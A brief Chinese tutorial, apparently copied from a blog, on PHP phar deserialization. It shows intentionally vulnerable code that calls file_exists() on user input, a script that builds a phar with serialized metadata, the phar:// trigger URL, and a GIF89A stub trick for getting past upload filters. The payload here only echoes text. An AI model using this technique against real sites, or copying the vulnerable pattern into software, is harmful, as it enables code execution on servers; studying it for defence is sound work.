https://blog.csdn.net/xiaolong22333/article/details/116092578
phar简单的利用,新建一个demo.php的文件
<?php
class TestObject{
public $name;
function __destruct()
{
echo $this->name;
}
}
if($_GET['file']){
file_exists($_GET['file']);
}
新建phar.php
<?php
class TestObject{
}
$p = new TestObject();
$p->name='hello';
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
访问phar.php生成新的test.phar文件
访问http://www.d.com/demo.php?file=phar://test.phar
就会触发phar反序列化
这是因为file_exists函数会触发phar反序列化
利用phar反序列化绕过文件上传案例
https://www.4hou.com/posts/5L38
运行这段代码,再把生成的test.phar后缀改为
<?php
class TestObject{
}
$p = new TestObject();
$p->name='hello';
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89A"."<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
gif就可以绕过限制上传